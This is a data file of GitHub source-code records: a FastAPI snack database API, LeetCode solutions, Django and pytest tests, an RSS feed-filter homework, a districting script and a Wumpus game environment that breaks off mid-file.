link_gambar: Any\n nutrition: Any\n recipe: Any\n\ndef get_db_connection():\n return mysql.connector.connect(**SNACKVIDIA_CONFIG)\n\nasync def get_current_user(token: str = Depends(verify_token)):\n return token\n\n# Integration to MySQL databases\nmydb = get_db_connection()\nmycursor = mydb.cursor()\n\n# Endpoint to get all snack data\n@router.get(\"/snackvidia\", response_model=List[Snack])\ndef get_snacks(current_user: dict = Depends(get_current_user)):\n mycursor.execute(\"SELECT * FROM datasnackvidia\")\n result = mycursor.fetchall()\n snacks = []\n if len(result) == 0:\n return {\"message\": \"No Snack 
Data\"}\n for row in result:\n objekSnack = Snack(nama_snack=row[0], deskripsi=row[1], rating=row[2], asal_daerah=row[3], harga=row[4], link_gambar=row[5], nutrition=row[6], recipe=row[7])\n snacks.append(objekSnack)\n return snacks\n\n# Endpoint to get snack data based on snack name\n@router.get(\"/snackvidia/{nama_snack}\", response_model=Snack)\ndef get_snack(nama_snack: str, current_user: dict = Depends(get_current_user)):\n mycursor.execute(\"SELECT * FROM datasnackvidia WHERE nama_snack = %s\", (nama_snack,))\n result = mycursor.fetchone()\n if result:\n objekSnack = Snack(nama_snack=result[0], deskripsi=result[1], rating=result[2], asal_daerah=result[3], harga=result[4], link_gambar=result[5], nutrition=result[6], recipe=result[7])\n return objekSnack\n else:\n raise HTTPException(status_code=404, detail=\"Snack not found\")\n\n# Endpoint to add new snack data\n@router.post(\"/snackvidia\", response_model=Snack)\ndef add_snack(objekSnack: Snack, current_user: dict = Depends(get_current_user)):\n try:\n query = \"INSERT INTO datasnackvidia (nama_snack, deskripsi, rating, asal_daerah, harga) VALUES (%s, %s, %s, %s, %s)\"\n values = (objekSnack.nama_snack, objekSnack.deskripsi, objekSnack.rating, objekSnack.asal_daerah, objekSnack.harga)\n mycursor.execute(query, values)\n mydb.commit()\n return objekSnack\n except Exception as e:\n raise HTTPException(status_code=500, detail=\"Internal server error\")\n\n# Endpoint to modify snack data\n@router.put(\"/snackvidia/{nama_snack}\", response_model=Snack)\ndef update_snack(nama_snack: str, snack_data: Snack, current_user: dict = Depends(get_current_user)):\n query = \"UPDATE datasnackvidia SET nama_snack = %s, deskripsi = %s, rating = %s, asal_daerah = %s, harga = %s WHERE nama_snack = %s\"\n values = (snack_data.nama_snack, snack_data.deskripsi, snack_data.rating, snack_data.asal_daerah, snack_data.harga, nama_snack)\n mycursor.execute(query, values)\n if mycursor.rowcount == 0:\n raise HTTPException(status_code=404, detail=\"Snack not found\")\n mydb.commit()\n raise HTTPException(status_code=200, detail=\"Snack updated\")\n\n# Endpoint to delete snack data based on snack name\n@router.delete(\"/snackvidia/{nama_snack}\")\ndef delete_snack(nama_snack: str, current_user: dict = Depends(get_current_user)):\n query = \"DELETE FROM datasnackvidia WHERE nama_snack = %s\"\n values = (nama_snack,)\n mycursor.execute(query, values)\n if mycursor.rowcount == 0:\n raise HTTPException(status_code=404, detail=\"Snack not found\")\n mydb.commit()\n return {\"message\": \"Snack deleted\"}","repo_name":"Snacktify/capstone-api","sub_path":"api/snackvidia.py","file_name":"snackvidia.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32362566267","text":"#\n# @lc app=leetcode id=264 lang=python3\n#\n# [264] Ugly Number II\n#\n# https://leetcode.com/problems/ugly-number-ii/description/\n#\n# algorithms\n# Medium (35.33%)\n# Total Accepted: 98.1K\n# Total Submissions: 274.9K\n# Testcase Example: '10'\n#\n# Write a program to find the n-th ugly number.\n#\n# Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. 
\n#\n# Example:\n#\n#\n# Input: n = 10\n# Output: 12\n# Explanation: 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first 10\n# ugly numbers.\n#\n# Note:  \n#\n#\n# 1 is typically treated as an ugly number.\n# n does not exceed 1690.\n#\n#\nfrom heapq import heappop, heappush\n\n\nclass Solution:\n def nthUglyNumber(self, n: int) -> int:\n if n == 1:\n return 1\n\n counter = 2\n numbers = []\n heappush(numbers, 2)\n heappush(numbers, 3)\n heappush(numbers, 5)\n seen = set([2, 3, 5])\n\n while True:\n ugly = heappop(numbers)\n if counter == n:\n return ugly\n counter += 1\n for c in (ugly*2, ugly*3, ugly*5):\n if c not in seen:\n seen.add(c)\n heappush(numbers, c)\n\n\ndef assert_eq(actual, expected):\n if actual != expected:\n raise AssertionError('expected: %s, actual: %s' % (expected, actual))\n\n\ndef test(input_, output):\n assert_eq(Solution().nthUglyNumber(input_), output)\n\n\nif __name__ == '__main__':\n test(1, 1)\n test(2, 2)\n test(3, 3)\n test(4, 4)\n test(5, 5)\n test(10, 12)\n","repo_name":"balta2ar/scratchpad","sub_path":"myleetcode/264_ugly_number_ii/264.ugly-number-ii.py","file_name":"264.ugly-number-ii.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31073012545","text":"from unittest.mock import Mock, call\n\nfrom homework_02.cacher import cache\n\n\ndef test_cacher():\n mock = Mock()\n\n def f(a):\n ans = a ** 2\n return ans\n\n f_mock = mock(f)\n cached = cache(f_mock)\n\n cached(1)\n cached(1)\n cached(2)\n cached(3)\n cached(2)\n cached(2)\n\n actual_result = mock.mock_calls\n expected_result = [call(f), call()(1), call()(2), call()(3)]\n assert expected_result == actual_result\n\n\ndef test_cacher_values():\n @cache\n def f(c):\n ans = c ** 2\n return ans\n\n a = f(3)\n b = f(3)\n assert a == b\n","repo_name":"ParamonovED/Epam_HW","sub_path":"homework_02/tests/test_cacher.py","file_name":"test_cacher.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35113599671","text":"\"\"\"\nSplashScreen.py\n\nNot finished. 
Will maybe be a splashscreen before the project starts.\n\nAuthor: Cyril Marx\nDate: 09.09.2021\n\"\"\"\n\nfrom src.GlobalLibraries import *\n\nclass SplashScreen:\n def __init__(self, network_manager, root):\n self.network_manager = network_manager\n self.root_frame = root\n splash_x = self.root_frame.winfo_width() // 2 - design.splash_width // 2\n splash_y = self.root_frame.winfo_height() // 2 - design.splash_height // 2\n self.splash = tk.Toplevel()\n self.splash.configure(background=design.grey_7[design.theme], highlightthickness=4,\n highlightbackground=design.grey_2[design.theme])\n self.splash.geometry(f\"{design.splash_width}x{design.splash_height}+{splash_x}+{splash_y}\")\n self.splash.overrideredirect(True)\n self.splash.grab_set()\n\n def close_splash_screen(self):\n self.splash.grab_release()\n self.splash.destroy()\n","repo_name":"Cycrus/COGNA_Editor","sub_path":"src/SpashScreen.py","file_name":"SpashScreen.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74965889543","text":"# 6.0001/6.00 Problem Set 5 - RSS Feed Filter\n# Name:\n# Collaborators:\n# Time:\n\nimport feedparser\nimport string\nimport time\nimport threading\nfrom project_util import translate_html\nfrom mtTkinter import *\nfrom datetime import datetime\nimport pytz\nimport os\n#-----------------------------------------------------------------------\n\n#======================\n# Code for retrieving and parsing\n# Google and Yahoo News feeds\n# Do not change this code\n#======================\n\ndef process(url):\n \"\"\"\n Fetches news items from the rss url and parses them.\n Returns a list of NewsStory-s.\n \"\"\"\n feed = feedparser.parse(url)\n entries = feed.entries\n ret = []\n for entry in entries:\n guid = entry.guid\n title = translate_html(entry.title)\n link = entry.link\n description = translate_html(entry.description)\n pubdate = translate_html(entry.published)\n\n try:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %Z\")\n pubdate.replace(tzinfo=pytz.timezone(\"GMT\"))\n # pubdate = pubdate.astimezone(pytz.timezone('EST'))\n # pubdate.replace(tzinfo=None)\n except ValueError:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %z\")\n\n newsStory = NewsStory(guid, title, description, link, pubdate)\n ret.append(newsStory)\n return ret\n\n#======================\n# Data structure design\n#======================\n\n# Problem 1\n\nclass NewsStory(object):\n\n def __init__(self, guid, title, description, link, pubdate):\n self.guid = guid\n self.title = title\n self.description = description\n self.link = link\n self.pubdate = pubdate\n \n def get_guid(self):\n return self.guid\n\n def get_title(self):\n return self.title\n\n def get_description(self):\n return self.description\n\n def get_link(self):\n return self.link\n\n def get_pubdate(self):\n return self.pubdate\n\n def constructor(self):\n '''\n Stores guid, title, description, link and pubdate of a feed into a dictionary for the later use\n Returns: feed dictionary \n - type: dict\n '''\n feed_dict = {}\n feed_dict['guid'] = self.get_guid\n feed_dict['title'] = self.get_title\n feed_dict['description'] = self.get_description\n feed_dict['link'] = self.get_link\n feed_dict['pubdate'] = self.get_pubdate\n\n return feed_dict\n\n\n#======================\n# Triggers\n#======================\n\nclass Trigger(object):\n def evaluate(self, story):\n \"\"\"\n Returns True if an alert should be generated\n for the given 
news item, or False otherwise.\n \"\"\"\n # DO NOT CHANGE THIS!\n raise NotImplementedError\n\n# PHRASE TRIGGERS\n\n# Problem 2\nclass PhaseTrigger(Trigger):\n def __init__(self, phase):\n self.phase = phase\n def is_phase_in(self, input_string):\n '''\n Takes in one string argument text, returns True if the whole phrase is presented in text, False other wise\n Return: True or False\n - type: Boolean val\n\n Requirement: \n - A pharse is one or more works sperated by a single space between words\n - The trigger will fire only when each word in the phrase is present in its \n entirety and appears consecutively in the text, sperated by spaces or punction\n - the trigger should not be case sensitive \n - split/replace/join methods will be certainly helpful\n '''\n lower_phase = self.phase.lower()\n phase_list = lower_phase.split(' ')\n print('CLEAN PHASE: ', phase_list)\n join_phase = ''.join(phase_list)\n lower_string = input_string.lower()\n exclude = list(string.punctuation)\n # nopunc_string = lower_string.replace(str([i for i in exclude]), ' ')\n # print('NO PUNC STRING: ', nopunc_string)\n clean_string = ''.join(charac if charac not in exclude else ' ' for charac in lower_string)\n string_list = clean_string.split(' ')\n print('CLEAN TEXT: ', string_list)\n join_text = ''.join(string_list)\n if set(phase_list).issubset(set(string_list)) and join_phase in join_text: \n print('True')\n return True\n else: \n print('False')\n return False \n \n\n\n \n\n\n# Problem 3\nclass TitleTrigger(PhaseTrigger):\n def __init__(self, phase):\n self.phase = phase\n\n def check_title(self, story):\n text = story.get_title()\n print('INPUT TEXT: ', text)\n return self.is_phase_in(text)\n def evaluate(self, story):\n return self.check_title(story)\n\n\n# Problem 4\nclass DescriptionTrigger(PhaseTrigger):\n def __init__(self, phase):\n self.phase = phase\n def check_description(self, story):\n descrip = story.get_description()\n return self.is_phase_in(descrip)\n def evaluate(self, story):\n return self.check_description(story)\n\n# TIME TRIGGERS\n\n# Problem 5\nclass TimeTrigger(Trigger):\n# Constructor:\n# Input: Time has to be in EST and in the format of \"%d %b %Y %H:%M:%S\".\n# Convert time from string to a datetime before saving it as an attribute.\n\n def __init__(self,time):\n self.time = datetime.strptime(time, '%d %b %Y %H:%M:%S') \n\n def convert_time(self, story_time):\n # conv_time = story_time.replace(tzinfo=pytz.timezone(\"EST\"))\n conv_time = story_time.replace(tzinfo=None)\n return conv_time\n # if self.time == conv_time: \n # return True\n # else: \n # return False\n\n\n# Problem 6\nclass BeforeTrigger(TimeTrigger):\n def __init__(self, trigger_time):\n self.time = datetime.strptime(trigger_time, '%d %b %Y %H:%M:%S') \n def beforetrigger(self, story):\n story_time = self.convert_time(story.get_pubdate())\n print('STORY TIME: ', story_time)\n print('TRIGGER TIME: ', self.time)\n return story_time < self.time\n # return True\n # else: \n # return False\n def evaluate(self, story):\n return self.beforetrigger(story)\n\n\nclass AfterTrigger(TimeTrigger):\n def __init__(self, trigger_time):\n self.time = datetime.strptime(trigger_time, '%d %b %Y %H:%M:%S') \n def aftertrigger(self, story):\n story_time = self.convert_time(story.get_pubdate())\n return story_time > self.time \n # return True\n # else: \n # return False\n def evaluate(self, story):\n return self.aftertrigger(story)\n\n\n# COMPOSITE TRIGGERS\n\n# Problem 7\nclass NotTrigger(Trigger):\n def __init__(self, trigger):\n self.trigger 
= trigger\n def invert_trigger(self, story):\n return not self.trigger.evaluate(story)\n def evaluate(self, story):\n return self.invert_trigger(story)\n\n# Problem 8\nclass AndTrigger(Trigger):\n def __init__(self, trigger1, trigger2):\n self.trigger1 = trigger1\n self.trigger2 = trigger2\n def trigger_both(self, story):\n trig_1 = self.trigger1.evaluate(story)\n trig_2 = self.trigger2.evaluate(story)\n return trig_1 & trig_2\n def evaluate(self, story):\n return self.trigger_both(story)\n\n# Problem 9\nclass OrTrigger(Trigger):\n def __init__(self, trigger1, trigger2):\n self.trigger1 = trigger1\n self.trigger2 = trigger2\n def trigger_both(self, story):\n trig_1 = self.trigger1.evaluate(story)\n trig_2 = self.trigger2.evaluate(story)\n return trig_1 | trig_2\n def evaluate(self, story):\n return self.trigger_both(story)\n\n\n#======================\n# Filtering\n#======================\n\n# Problem 10\ndef filter_stories(stories, triggerlist):\n \"\"\"\n Takes in a list of NewsStory instances.\n\n Returns: a list of only the stories for which a trigger in triggerlist fires.\n \"\"\"\n # TODO: Problem 10\n fire_stories = []\n for story in stories: \n for trigger in triggerlist:\n if trigger.evaluate(story):\n fire_stories.append(story)\n return fire_stories\n\n\n\n#======================\n# User-Specified Triggers\n#======================\n# Problem 11\ndef read_trigger_config(filename):\n \"\"\"\n filename: the name of a trigger configuration file\n\n Returns: a list of trigger objects specified by the trigger configuration\n file.\n \"\"\"\n # We give you the code to read in the file and eliminate blank lines and\n # comments. You don't need to know how it works for now!\n trigger_file = open(filename, 'r')\n trig_map = {'DESCRIPTION':DescriptionTrigger,\n 'TITLE': TitleTrigger,\n 'AFTER': AfterTrigger,\n 'BEFORE': BeforeTrigger,\n 'NOT': NotTrigger,\n 'AND': AndTrigger,\n 'OR': OrTrigger}\n config_trigs = {}\n triggers = []\n lines = []\n for line in trigger_file:\n line = line.rstrip()\n if not (len(line) == 0 or line.startswith('//')):\n lines.append(line)\n # print('LINES')\n # print(lines)\n # TODO: Problem 11\n \n # line is the list of lines that you need to parse and for which you need\n # to build triggers\n for line in lines: \n eles = line.split(',')\n trig_name = eles[0]\n # print('ELES')\n # print(eles)\n if trig_name not in ['ADD','OR','NOT']:\n args = eles[2:]\n # print('TRIG_NAME')\n # print(trig_name)\n # if eles[1] in trig_map.keys():\n if len(eles) <= 3: \n # if len(args) <=1 :\n config_trigs[trig_name] = trig_map[eles[1]](args[0])\n \n print(config_trigs)\n else: \n trig1, trig2 = [config_trigs[arg] for arg in args]\n print(trig1, trig2)\n config_trigs[trig_name] = trig_map[eles[1]](trig1, trig2)\n \n # elif eles[0] in trig_map.keys():\n # # print(\"it's ADD\")\n # raise ValueError\n else: \n trig1, trig2 = [config_trigs[arg] for arg in args]\n triggers.extend((trig1, trig2))\n # print('TRIGGERS...')\n print('TRIGGERS') \n print(triggers) # for now, print it so you see what it contains!\n return triggers\n\n\nSLEEPTIME = 120 #seconds -- how often we poll\n\ndef main_thread(master):\n # A sample trigger list - you might need to change the phrases to correspond\n # to what is currently in the news\n cwd = os.getcwd()\n path = os.path.join(cwd, 'section 5/pset5hw/hw.txt')\n try:\n print('TRYING...')\n t1 = TitleTrigger(\"election\")\n t2 = DescriptionTrigger(\"Trump\")\n t3 = DescriptionTrigger(\"Clinton\")\n t4 = AndTrigger(t2, t3)\n triggerlist = [t1, t4]\n\n # 
Problem 11\n # TODO: After implementing read_trigger_config, uncomment this line \n triggerlist = read_trigger_config(path)\n print('TRIGGERS CALL ...')\n # HELPER CODE - you don't need to understand this!\n # Draws the popup window that displays the filtered stories\n # Retrieves and filters the stories from the RSS feeds\n frame = Frame(master)\n frame.pack(side=BOTTOM)\n scrollbar = Scrollbar(master)\n scrollbar.pack(side=RIGHT,fill=Y)\n\n t = \"Google & Yahoo Top News\"\n title = StringVar()\n title.set(t)\n ttl = Label(master, textvariable=title, font=(\"Helvetica\", 18))\n ttl.pack(side=TOP)\n cont = Text(master, font=(\"Helvetica\",14), yscrollcommand=scrollbar.set)\n cont.pack(side=BOTTOM)\n cont.tag_config(\"title\", justify='center')\n button = Button(frame, text=\"Exit\", command=root.destroy)\n button.pack(side=BOTTOM)\n guidShown = []\n def get_cont(newstory):\n if newstory.get_guid() not in guidShown:\n cont.insert(END, newstory.get_title()+\"\\n\", \"title\")\n cont.insert(END, \"\\n---------------------------------------------------------------\\n\", \"title\")\n cont.insert(END, newstory.get_description())\n cont.insert(END, \"\\n*********************************************************************\\n\", \"title\")\n guidShown.append(newstory.get_guid())\n\n while True:\n\n # print(\"Polling . . .\", end=' ')\n # Get stories from Google's Top Stories RSS news feed\n stories = process(\"http://news.google.com/news?output=rss\")\n\n # Get stories from Yahoo's Top Stories RSS news feed\n stories.extend(process(\"http://news.yahoo.com/rss/topstories\"))\n\n stories = filter_stories(stories, triggerlist)\n\n list(map(get_cont, stories))\n scrollbar.config(command=cont.yview)\n\n\n print(\"Sleeping...\")\n time.sleep(SLEEPTIME)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(\"Some RSS parser\")\n t = threading.Thread(target=main_thread, args=(root,))\n t.start()\n root.mainloop()\n\n","repo_name":"dyadxmachina/computation","sub_path":"section 5/pset5hw/ps5.py","file_name":"ps5.py","file_ext":"py","file_size_in_byte":13143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11364299833","text":"from django.test import TestCase\nfrom rest_framework.test import APIClient\nfrom django.urls import reverse\nfrom rest_framework import status\n\nCREATE_OUTLIER_URL = reverse('create_outliers')\nclass TestOutlier(TestCase):\n '''Create a new Outlier'''\n\n def setUp(self):\n self.client = APIClient()\n\n def test_create_outlier_success(self):\n '''Test creating a new Outlier'''\n\n payload = {\n 'project_name': 'RaizenOutlier',\n 'table_name': 'Values',\n 'outlier': '1 0.6'\n }\n\n res = self.client.post(CREATE_OUTLIER_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n \n def test_create_outlier_error(self):\n '''Test creating a new Outlier with an error code'''\n\n payload = {\n 'project_name': 'RaizenOutlier',\n 'table_name': 'Values',\n 'outlier': '1 '\n }\n\n res = self.client.post(CREATE_OUTLIER_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n \n \n\nclass ListOutlier(TestCase):\n '''List Outliers registered'''\n\n def setUp(self):\n self.client = APIClient()\n payload = {\n 'project_name': 'RaizenOutlier',\n 'table_name': 'Values',\n 'outlier': '1 0.6'\n }\n\n self.client.post(CREATE_OUTLIER_URL, payload)\n\n def test_list_outlier(self):\n '''Test Listining Outliers'''\n\n res = 
self.client.get('/api/list_outliers/RaizenOutlier/Values/')\n self.assertEqual(res.status_code, status.HTTP_200_OK)","repo_name":"AdrianoCasimiro/outlier_monitor","sub_path":"api/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35052803156","text":"\nimport queue\nimport threading\nimport time\nimport random\n\nq = queue.Queue()\n\nclass Productor(threading.Thread):\n def __init__(self, q):\n threading.Thread.__init__(self)\n self.q = q\n\n def run(self):\n while True:\n a = self.q.put(1)\n b = self.q.put(2)\n time.sleep(1)\n print(\"Contenido de la cola: \"+str(list(self.q.queue)))\n\n\nclass Consumidor(threading.Thread):\n def __init__(self, q):\n threading.Thread.__init__(self)\n self.q = q\n\n def run(self):\n while True:\n a = self.q.get()\n b = self.q.get()\n sum = a + b\n print(sum)\n time.sleep(2) \n\np = Productor(q)\nc = Consumidor(q)\n\np.start()\nc.start()\n\np.join()\nc.join()\n\n\n\n","repo_name":"DiegoRP6/PSP","sub_path":"PracticaU1/PracticaTipoExamen1.py","file_name":"PracticaTipoExamen1.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2365311021","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 28 21:22:07 2015\n\n@author: ellie\n\"\"\"\nfrom matplotlib import pyplot\nfrom shapely.geometry import Polygon\nfrom shapely.geometry import MultiPolygon\nfrom shapely.geometry import LineString\nimport shapely.geos\nimport numpy as np\nfrom descartes import PolygonPatch\nfrom matplotlib.collections import PatchCollection\nimport math\nimport time\nimport gerrymander as gerry\ndef isoperi(polygon):\n area=polygon.area\n perim=polygon.length\n num=4*math.pi*area\n denom=perim**2\n quo=num/denom\n return quo\ndef distance(p1,p2):\n return math.sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)\n\n# sorts precincts by position with respect to the specified angle\ndef lineSortPrecincts(precincts,angle):\n sin = math.sin(angle)\n cos = math.cos(angle)\n def dot(pos):\n return cos*pos[0] + sin*pos[1]\n def comp(x,y):\n return cmp(dot(x.position()),dot(y.position()))\n precincts = sorted(precincts,comp)\n return precincts\ndef landgrab(precincts,districts,startTime=time.time()):\n# print('hi')\n if(districts == 1):\n dist = gerry.District(precincts)\n return [dist]\n print('splitting an area into', districts, 'districts...','at', time.time()-startTime, 'seconds')\n lowAmt = int(districts/2.0)\n ratio = lowAmt/float(districts-lowAmt)\n\n from random import sample\n\n# def findFarthest():\n# i=0\n# def findMax(p1):\n# return max((isoperi(p),p) for p in precincts)[1]\n# p1 = sample(precincts,1)[0]\n# ls=[]\n# while i0):\n return True\n return False\n def inParts(nextP):\n for part in parts:\n if nextP in part:\n return True\n return False\n \n \n# while lengthOK():\n## if (i>=50 and i%delta==0):\n## checkForEnclaves(unassigned)\n# for d1 in range(districts):\n# f1=f[d1]\n# pop1=pops[d1]\n# part1=parts[d1]\n# for d2 in range(districts):\n# if (d1==d2):\n# break\n# f2=f[d2]\n# pop2=pops[d2]\n# part2=parts[d2]\n# while((len(f1) == 0 or pop2/float(pop1+1) < 1.0/ratio) and len(f2) > 0):\n# t=heapq.heappop(f[d2])\n# print(t)\n# if (type(t) is int):\n# continue\n# nextP = t[1]\n# if(inParts(nextP)):\n# continue\n# parts[d2].add(nextP)\n# pops[d2] = pops[d2] + nextP.population()\n# new = [toTup(d[d2],p) for p in nextP.adjacent() if p in these and not 
inParts(p)]\n# for p in new:\n# heapq.heappush(f2,p)\n \n# print 'lengths:','p1:',len(part1),'p2:',len(part2)\n while len(f1) > 0 or len(f2) > 0:\n while((len(f1) == 0 or pop2/float(pop1+1) < 1.0/ratio) and len(f2) > 0):\n t=heapq.heappop(f2)\n# print(t)\n if (type(t) is int):\n break\n nextP = t[1]\n if(nextP in part1 or nextP in part2):\n continue\n part2.add(nextP)\n pop2 = pop2 + nextP.population()\n new = [toTup(precinct1,p) for p in nextP.adjacent() if p in these and p not in part1 and p not in part2]\n for p in new:\n heapq.heappush(f2,p)\n while((len(f2) == 0 or pop1/float(pop2+1) < ratio) and len(f1) > 0):\n t=heapq.heappop(f1)\n# print(t)\n if (type(t) is int):\n break\n nextP = t[1]\n if(nextP in part1 or nextP in part2):\n continue\n part1.add(nextP)\n pop1 = pop1 + nextP.population()\n new = [toTup(precinct2,p) for p in nextP.adjacent() if p in these and p not in part1 and p not in part2]\n for p in new:\n heapq.heappush(f1,p)\n\n \"\"\"pop1 = sum(p.population() for p in part1)\n pop2 = sum(p.population() for p in part2)\"\"\"\n \"\"\"lowAmt = (min(pop1,pop2)*districts)/(pop1+pop2)\"\"\"\n \"\"\"if(pop1 > pop2):\n part1, part2 = part2, part1\"\"\"\n dists = [gerry.District(part1),gerry.District(part2)]\n# dists=d\n# for dis in range(districts):\n# print('part', str(dis+1),'has pop:', dists[dis].population())\n drawAsher(dists, time.ctime(), '')\n print('part 1 has pop:',dists[0].population(),'part 2 has pop:',dists[1].population())\n# return dists\n# sm=[]\n# for part in parts:\n# sm = sm+landgrab(part, lowAmt, startTime, fileName, title)\n# return sm\n leftSplit = landgrab(part1,lowAmt,startTime)\n rightSplit = landgrab(part2,districts-lowAmt,startTime)\n return leftSplit + rightSplit\ndef drawLE(districts, fileName, title):\n mp=shapely.geometry.MultiPolygon([district.asPolygon() for district in districts])\n cm = pyplot.get_cmap('YlOrRd')\n num_colours=len(mp)\n## num_colours = len(mp)\n## p=shapely.geometry.Polygon([(0,0), (1, 0), (1,1)])\n## p.\n fig = pyplot.figure()\n ax = fig.add_subplot(111)\n if (len(mp)==0):\n minx=0\n miny=0\n maxx=100\n maxy=100\n else:\n minx, miny, maxx, maxy = mp.bounds\n \n w, h = maxx - minx, maxy - miny\n ax.set_xlim(minx - 0.2 * w, maxx + 0.2 * w)\n ax.set_ylim(miny - 0.2 * h, maxy + 0.2 * h)\n ax.set_aspect(1)\n \n patches = []\n for idx, p in enumerate(mp):\n \n colour = cm(1. 
* idx / num_colours)\n patches.append(PolygonPatch(p, fc=colour, ec='#555555', lw=0.2, alpha=1., zorder=1))\n ax.add_collection(PatchCollection(patches, match_original=True))\n ax.set_xticks([])\n ax.set_yticks([])\n pyplot.title(title)\n pyplot.tight_layout()\n# print('heelo')\n pyplot.savefig(fileName+'v1.png', alpha=True, dpi=300)\n pyplot.show()\ndef drawAsher(result, fileName, title):\n mp = MultiPolygon([district.asPolygon() for district in result])\n fig = pyplot.figure()\n ax = fig.add_subplot(111)\n num_colours = len(result)\n minx, miny, maxx, maxy = mp.bounds\n w, h = maxx - minx, maxy - miny\n ax.set_xlim(minx - 0.1 * w, maxx + 0.1 * w)\n ax.set_ylim(miny - 0.1 * h, maxy + 0.1 * h)\n ax.set_aspect(1)\n\n maxPop = max(max(precinct.population()/precinct.area for precinct in district.precincts()) for district in result)\n\n patches = []\n for i in range(len(result)):\n\t #patches.append(PolygonPatch(result[i][1], ec='black', lw=1.0, alpha=1, zorder=1))\n color = np.random.rand(3,)\n for polygon in result[i].precincts():\n patches.append(PolygonPatch(polygon, fc=color, alpha=min(pow(float(polygon.population()/polygon.area) / maxPop,1.0/3.0)*4+0.4,1.0), lw=0, zorder=1))\n ax.add_collection(PatchCollection(patches, match_original=True))\n for i in range(len(result)):\n x,y = result[i].asPolygon().exterior.xy\n ax.plot(x, y, color='black', alpha=1,linewidth=1, solid_capstyle='round', zorder=1)\n ax.set_xticks([])\n ax.set_yticks([])\n pyplot.title(title)\n pyplot.tight_layout()\n pyplot.savefig(fileName+'v2.png', alpha=True, dpi=300)\n pyplot.show()","repo_name":"lelisadav/HowToStealAnElection","sub_path":"workspace/Final/landgrab.py","file_name":"landgrab.py","file_ext":"py","file_size_in_byte":9894,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"24874416124","text":"class Solution(object):\n def search(self, reader, target):\n \"\"\"\n :type reader: ArrayReader\n :type target: int\n :rtype: int\n \"\"\"\n # findout the upper bound of the index using exponential backoff\n k = 0\n cnt = 0\n while reader.get(k) < target:\n k += 2**cnt\n cnt += 1\n\n start, end = 0, k\n\n while start + 1 < end:\n mid = start + (end-start)//2\n if reader.get(mid) == target:\n return mid\n elif reader.get(mid) < target:\n start = mid\n else:\n end = mid\n\n if reader.get(start) == target:\n return start\n if reader.get(end) == target:\n return end\n\n return -1","repo_name":"OrangePeelZ/codingTime","sub_path":"Search_in_a_Sorted_Array_of_Unknown_Size.py","file_name":"Search_in_a_Sorted_Array_of_Unknown_Size.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70944394186","text":"import random\nimport sys\n\nimport numpy as np\nfrom gpl.utils import Bunch\nimport copy\n\nfrom ..grammar.objects import WUMPUS, GOLD, AGENT, EMPTY, PIT, PLAYER1, PLAYER2\nfrom ..utils import identify_next_player\n\n\nSIMPLIFIED_OBJECT = {\n EMPTY:' . 
',\n WUMPUS:' W ',\n AGENT:' A ',\n GOLD:' g ',\n PIT:' * ',\n}\n\nTURN_TO_PIECES = {\n PLAYER1: [AGENT,],\n PLAYER2: [WUMPUS,],\n}\n\nopposite_player = lambda c: PLAYER2 if c == PLAYER1 else PLAYER1\n\n\nPIECE_VALID_ACTIONS = {\n AGENT: lambda pos, rep, params: agent_valid_actions(pos, rep, params),\n WUMPUS: lambda pos, rep, params: wumpus_valid_actions(pos, rep, params),\n}\n\n# Actions IDs\n\nUP = 0\nDOWN = 1\nRIGHT = 2\nLEFT = 3\nLEFTUP = 4\nRIGHTUP = 5\nRIGHTDOWN = 6\nLEFTDOWN = 7\n\nACTION_MOVE_DIRECTION = {\n UP: (-1, 0),\n DOWN: (1, 0),\n RIGHT: (0, 1),\n LEFT: (0, -1),\n LEFTUP: (-1, -1),\n RIGHTUP: (-1, 1),\n RIGHTDOWN: (1, 1),\n LEFTDOWN: (1, -1),\n}\n\nMOVE_ACTION = {\n ACTION_MOVE_DIRECTION[UP]: UP,\n ACTION_MOVE_DIRECTION[DOWN]: DOWN,\n ACTION_MOVE_DIRECTION[RIGHT]: RIGHT,\n ACTION_MOVE_DIRECTION[LEFT]: LEFT,\n ACTION_MOVE_DIRECTION[LEFTUP]: LEFTUP,\n ACTION_MOVE_DIRECTION[RIGHTUP]: RIGHTUP,\n ACTION_MOVE_DIRECTION[RIGHTDOWN]: RIGHTDOWN,\n ACTION_MOVE_DIRECTION[LEFTDOWN]: LEFTDOWN,\n}\n\n# unary predicates\nAT_WUMPUS = 'at_wumpus'\nAT_PIT = 'at_pit'\n\n\n# Begin Wumpus =================================\n\nclass Env(object):\n def __init__(self, params):\n self.params = params\n\n def act(self, rep, action):\n layout = rep.grid\n assert rep.nact < self.params.max_actions[rep.player] + 1\n assert not terminated(rep)\n valid_actions = self.available_actions(rep)\n assert action in valid_actions\n l = layout.copy()\n if rep.player == PLAYER1:\n l, at_wumpus_, 